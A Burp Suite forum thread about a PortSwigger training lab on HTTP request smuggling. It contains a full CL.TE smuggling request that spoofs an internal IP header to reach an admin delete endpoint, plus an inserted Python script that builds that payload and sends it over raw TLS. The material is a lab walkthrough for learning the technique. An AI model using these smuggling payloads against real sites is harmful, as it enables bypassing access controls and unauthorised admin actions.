The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum


LAB: Exploiting HTTP request smuggling to reveal front-end request rewriting

Adam | Last updated: Nov 27, 2021 04:51AM UTC

Hello, I have followed everything exactly as written in the tutorial and in the video. At the end of the video Michael Sommer says "the lab is solved", but it isn't, and he has to keep trying and trying for two minutes and finally gets it to change to SOLVED. I'm exactly at that point. Yes, in REPEATER "Update Content-Length" is unchecked. I do have "HTTP Request Smuggler" installed. In solution #5 I couldn't see the admin panel, so I went on to #6. I get to #6 in the Solution, and it acknowledges the 127.0.0.1 with the "Admin interface only available if logged in as an administrator, or if requested from 127.0.0.1"... I change the 127.0.0.1 address to the one I was able to get in #3 but am still unable to solve the lab. I had seen Michael Sommer have the same problem and solve it in two minutes, but although I followed every keystroke, after 6 hours I still can't solve it. What could I possibly be doing wrong??? Any help would be greatly appreciated, thank you.

Adam | Last updated: Nov 27, 2021 03:07PM UTC

I do have 2 spaces after x=1

Ben, PortSwigger Agent | Last updated: Nov 29, 2021 09:56AM UTC

Hi Adam,

Just to confirm, it sounds like you are changing the address from 127.0.0.1 to the IP returned as a result of the request sent in step 3, is that correct? You do not need to change the IP address, you just need to add the header that is returned from the request in step 3 and give it the value 127.0.0.1, i.e., in the lab attempt I have just carried out, the header returned was X-ayZFvQ-Ip, so the final request I sent was:

    POST / HTTP/1.1
    Host: ac201fbc1fd627ddc0effe2300f200de.web-security-academy.net
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 166
    Transfer-Encoding: chunked

    0

    GET /admin/delete?username=carlos HTTP/1.1
    X-ayZFvQ-Ip: 127.0.0.1
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 10
    Connection: close

    x=1
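Added worked example (editor's code, not part of Ben's or Adam's posts and not PortSwigger's own tooling): a small Python script that assembles the CL.TE request Ben lays out above, re-checks that the outer Content-Length covers every byte after the blank line (the terminating "0" chunk, its CRLFs and the whole smuggled request), and can send the bytes over a raw TLS socket so nothing recalculates the length on the way out. The lab host and the X-ayZFvQ-Ip header name are the ones from Ben's post; the reflected search text in SAMPLE_REFLECTED is constructed to look like the step-3 response, not captured from a live lab. For Ben's exact inputs the computed length is 166, matching his request.

```python
"""Build and sanity-check a CL.TE request-smuggling payload of the kind
discussed in this thread. Added example; not PortSwigger's or the posters'
code. Host and header name are taken from the thread; the reflected search
text below is constructed, not captured from a live lab."""
import re
import socket
import ssl
from typing import Optional, Tuple

CRLF = "\r\n"
HOST = "ac201fbc1fd627ddc0effe2300f200de.web-security-academy.net"  # from Ben's post

# Constructed stand-in for the step-3 response: the lab's search page echoes
# the request as the back-end received it, including the header the
# front-end appended. Layout is assumed, not copied from a real lab.
SAMPLE_REFLECTED = (
    "0 search results for 'GET /search?search=foo HTTP/1.1\n"
    "Host: ac201fbc1fd627ddc0effe2300f200de.web-security-academy.net\n"
    "X-ayZFvQ-Ip: 203.0.113.5\n"
    "Content-Type: application/x-www-form-urlencoded'"
)


def extract_rewritten_header(reflected: str) -> Optional[str]:
    """Pull the name of the front-end-added X-<random>-Ip header out of the
    reflected request text. Only the *name* is needed; the value the
    front-end wrote (the real client IP) is replaced with 127.0.0.1 later."""
    m = re.search(r"^(X-[A-Za-z0-9]+-Ip):", reflected, re.MULTILINE)
    return m.group(1) if m else None


def build_smuggled_request(host: str, ip_header: str,
                           target: str = "/admin/delete?username=carlos",
                           spoof_ip: str = "127.0.0.1") -> bytes:
    """Assemble the outer POST (CL.TE) that carries the smuggled admin GET.

    The front-end honours Content-Length, so it must cover every byte after
    the blank line: the "0" chunk, its two CRLFs and the whole smuggled
    request. Letting a proxy recalculate it, or miscounting by a few bytes,
    is enough for the smuggled request never to be processed as intended."""
    smuggled = CRLF.join([
        f"GET {target} HTTP/1.1",
        f"{ip_header}: {spoof_ip}",   # passes the back-end's 127.0.0.1 check
        "Content-Type: application/x-www-form-urlencoded",
        "Content-Length: 10",   # only 3 body bytes follow; the back-end takes
        "Connection: close",    # the missing 7 from the start of the next request
        "",
        "x=1",
    ])
    body = "0" + CRLF + CRLF + smuggled   # back-end (TE) stops at the empty chunk
    outer = CRLF.join([
        "POST / HTTP/1.1",
        f"Host: {host}",
        "Content-Type: application/x-www-form-urlencoded",
        f"Content-Length: {len(body.encode('ascii'))}",
        "Transfer-Encoding: chunked",
        "",
        "",
    ])
    return (outer + body).encode("ascii")


def check_content_length(raw: bytes) -> Tuple[int, int]:
    """Return (declared Content-Length, actual byte count after the outer
    header block). They must be equal for the CL.TE split to land where
    intended; a mismatch is the first thing to look for when a lab like
    this refuses to solve."""
    head, _, payload = raw.partition(b"\r\n\r\n")
    m = re.search(rb"^Content-Length:\s*(\d+)\r?$", head,
                  re.MULTILINE | re.IGNORECASE)
    declared = int(m.group(1)) if m else -1
    return declared, len(payload)


def send_raw(host: str, raw: bytes, port: int = 443, timeout: float = 10.0) -> bytes:
    """Send the bytes untouched over TLS (no HTTP client library, so nothing
    rewrites Content-Length or re-chunks the body) and return the reply."""
    ctx = ssl.create_default_context()
    with socket.create_connection((host, port), timeout=timeout) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            tls.sendall(raw)
            chunks = []
            try:
                while True:
                    data = tls.recv(4096)
                    if not data:
                        break
                    chunks.append(data)
            except socket.timeout:
                pass
            return b"".join(chunks)


if __name__ == "__main__":
    header = extract_rewritten_header(SAMPLE_REFLECTED)
    req = build_smuggled_request(HOST, header)
    print(req.decode("ascii"))
    print("declared/actual Content-Length:", check_content_length(req))
    # Against a live lab: the response to the smuggled GET is delivered to the
    # next request on the same back-end connection, so send it a second time
    # (or make any follow-up request) to see it.
    # print(send_raw(HOST, req).decode("latin-1"))
```

The script deliberately avoids `requests` or `http.client`, because both will happily normalise Content-Length and the chunked body and thereby undo the CL/TE disagreement the attack depends on; the same thing happens in Repeater when "Update Content-Length" is left on.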

Adam | Last updated: Nov 29, 2021 08:07PM UTC